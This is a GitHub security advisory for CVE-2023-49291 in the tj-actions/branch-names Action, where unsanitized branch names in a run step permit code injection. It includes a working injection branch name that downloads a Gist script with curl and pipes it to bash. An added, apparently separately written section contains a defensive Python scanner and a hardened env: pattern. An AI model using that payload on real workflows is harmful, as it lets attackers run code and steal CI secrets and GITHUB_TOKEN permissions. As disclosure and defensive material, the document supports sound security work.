tj-actions/branch-names's Improper Sanitization of Branch Name Leads to Arbitrary Code Injection

Critical severity GitHub Reviewed Published Dec 4, 2023 in tj-actions/branch-names • Updated Dec 7, 2023

Package

actions tj-actions/branch-names (GitHub Actions)

Affected versions

< 7.0.7

Patched versions

7.0.7

Description

Summary

The tj-actions/branch-names GitHub Action references the github.event.pull_request.head.ref and github.head_ref context variables within a GitHub Actions run step. The head ref variable is the branch name, and a specially crafted branch name can be used to execute arbitrary code.

Details

The vulnerable code is within the action.yml file: the run step references the context value directly inside the script, instead of a sanitized variable.

runs:
  using: "composite"
  steps:
    - id: branch
      run: |
        # "Set branch names..."
        if [[ "${{ github.ref }}" != "refs/tags/"* ]]; then
          BASE_REF=$(printf "%q" "${{ github.event.pull_request.base.ref || github.base_ref }}")
          HEAD_REF=$(printf "%q" "${{ github.event.pull_request.head.ref || github.head_ref }}")
          REF=$(printf "%q" "${{ github.ref }}")

An attacker can use a branch name to inject arbitrary code. For example, the branch name Test")${IFS}&&${IFS}{curl,-sSfL,gist.githubusercontent.com/RampagingSloth/72511291630c7f95f0d8ffabb3c80fbf/raw/inject.sh}${IFS}|${IFS}bash&&echo${IFS}$("foo will download and run a script from a Gist, which lets an attacker inject a payload of arbitrary complexity.
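As an added example (not code from the advisory or from tj-actions/branch-names), the following Python script does two things a defender would want here: it scans action or workflow YAML for attacker-controllable contexts interpolated into run: scripts, and it simulates the runner's textual expansion of ${{ }} expressions to show why a printf "%q" inside the script cannot sanitize the value, since the value has already been spliced into the script text before the shell parses it. The embedded YAML samples are constructed for this example; the hardened variant passes the value through env: so the shell only ever sees it as an environment variable. The list of untrusted contexts and all helper names are assumptions made for this example, not a statement of how the 7.0.7 patch was written.

```python
"""Added example, not part of the advisory or of tj-actions/branch-names.
Scans GitHub Actions YAML for untrusted expressions inside `run:` scripts and
simulates the textual expansion that makes in-script quoting ineffective."""
import re

# Contexts a pull-request author controls. Assumed, illustrative list that
# follows GitHub's published script-injection guidance; not exhaustive.
UNTRUSTED_CONTEXTS = (
    "github.head_ref",
    "github.event.pull_request.head.ref",
    "github.event.pull_request.head.label",
    "github.event.pull_request.title",
    "github.event.pull_request.body",
    "github.event.issue.title",
    "github.event.comment.body",
    "github.event.head_commit.message",
)

EXPR_RE = re.compile(r"\$\{\{(.*?)\}\}")
RUN_KEY_RE = re.compile(r"^(-\s+)?run:")


def find_unsafe_run_expressions(yaml_text):
    """Return (line_number, context) pairs for untrusted contexts that appear
    inside a `run:` block. A run block extends from the `run:` line until the
    indentation returns to the level of the `run:` key. Shell comment lines
    are scanned too: expansion happens before the shell sees the script, so
    a leading `#` gives no protection against a value containing a newline."""
    findings = []
    run_indent = None
    for lineno, line in enumerate(yaml_text.splitlines(), start=1):
        stripped = line.lstrip()
        if not stripped:
            continue
        indent = len(line) - len(stripped)
        if run_indent is not None and indent <= run_indent:
            run_indent = None          # left the run block
        if run_indent is None and RUN_KEY_RE.match(stripped):
            run_indent = indent        # entering a run block (inline or `|`)
        if run_indent is None:
            continue                   # expressions under env:/with: are not script text
        for expr in EXPR_RE.findall(line):
            for ctx in UNTRUSTED_CONTEXTS:
                if ctx in expr:
                    findings.append((lineno, ctx))
    return findings


def expand_expressions(script, context):
    """Simulate the runner: each ${{ ... }} is replaced by the context value as
    plain text before the shell runs. Only bare context names joined by `||`
    are evaluated, which is enough to show the effect."""
    def repl(match):
        for name in match.group(1).split("||"):
            value = context.get(name.strip(), "")
            if value:
                return value
        return ""
    return EXPR_RE.sub(repl, script)


def quotes_balanced(line):
    """True when the rendered line has an even number of double quotes, i.e.
    the interpolated value stayed inside the string the author wrote."""
    return line.count('"') % 2 == 0


# Constructed sample: the vulnerable pattern (expression inside `run:`).
VULNERABLE_ACTION = """\
runs:
  using: "composite"
  steps:
    - id: branch
      run: |
        HEAD_REF=$(printf "%q" "${{ github.event.pull_request.head.ref || github.head_ref }}")
        echo "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"
      shell: bash
"""

# Constructed sample: hardened pattern. The value reaches the script only as
# an environment variable, so the shell never parses it as code.
HARDENED_ACTION = """\
runs:
  using: "composite"
  steps:
    - id: branch
      env:
        HEAD_REF: ${{ github.event.pull_request.head.ref || github.head_ref }}
      run: |
        HEAD_REF=$(printf "%q" "$HEAD_REF")
        echo "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"
      shell: bash
"""

VULNERABLE_LINE = 'HEAD_REF=$(printf "%q" "${{ github.event.pull_request.head.ref || github.head_ref }}")'

if __name__ == "__main__":
    print("vulnerable:", find_unsafe_run_expressions(VULNERABLE_ACTION))
    print("hardened:  ", find_unsafe_run_expressions(HARDENED_ACTION))
    for branch in ("feature/login", 'feature"broken'):  # constructed branch names
        rendered = expand_expressions(VULNERABLE_LINE, {"github.head_ref": branch})
        print(f"{branch!r}: balanced={quotes_balanced(rendered)}  {rendered}")
```

Run the script against a checked-out action.yml by passing its contents to find_unsafe_run_expressions; any finding is a line where the fix is to move the expression into an env: mapping and reference the variable by name in the script. The quote-balance check is deliberately crude: it only shows that a single double quote in the branch name already puts part of the value outside the author's quoting, which is the whole reason printf "%q" applied afterwards comes too late.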

Impact

An attacker can use this vulnerability to steal secrets available to the workflow or to abuse the permissions granted to the GITHUB_TOKEN.

References

@jackton1 jackton1 published to tj-actions/branch-names Dec 4, 2023
Published by the National Vulnerability Database Dec 5, 2023
Published to the GitHub Advisory Database Dec 5, 2023
Reviewed Dec 5, 2023
Last updated Dec 7, 2023

Severity

Critical
9.3
/ 10

CVSS base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Changed
Confidentiality
Low
Integrity
High
Availability
None
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:N

Weaknesses

CVE ID

CVE-2023-49291

GHSA ID

GHSA-8v8w-v8xg-79rf

Credits
